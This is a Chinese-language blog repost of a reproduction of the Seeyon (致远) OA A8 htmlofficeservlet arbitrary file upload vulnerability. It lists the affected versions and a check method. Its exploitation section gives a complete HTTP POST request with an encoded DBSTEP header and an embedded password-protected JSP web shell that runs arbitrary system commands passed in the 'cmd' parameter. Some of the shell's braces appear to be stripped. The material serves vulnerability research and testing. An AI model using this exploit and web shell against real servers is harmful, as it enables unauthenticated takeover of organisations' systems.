致远OA A8 htmlofficeservlet 任意文件上传漏洞漏洞复现

Posted 2023-03-30 Vista、

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了致远OA A8 htmlofficeservlet 任意文件上传漏洞漏洞复现相关的知识，希望对你有一定的参考价值。

为方便您的阅读，可点击下方蓝色字体，进行跳转↓↓↓

01 漏洞描述

远程攻击者在无需登录的情况下可通过向 URL /seeyon/htmlofficeservlet POST 精心构造的数据即可向目标服务器写入任意文件，写入成功后可执行任意系统命令进而控制目标服务器。

02 影响范围

致远A8-V5协同管理软件V6.1sp1
致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3
致远A8+协同管理软件V7.1

03 验证方式

尝试访问路径/seeyon/htmlofficeservlet，出现如下图响应，则可能含有漏洞；

04 利用方式

1、构造如下数据包上传脚本文件：

POST /seeyon/htmlofficeservlet HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1120

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) StringBuilder line = new StringBuilder();try Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) line.append(temp+"\\n");buf.close(); catch (Exception e) line.append(e.getMessage());return line.toString(); %><%if("calsee".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))out.println("
<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");elseout.println(":-)");%>>a6e4f045d4b8506bf492ada7e3390d7ce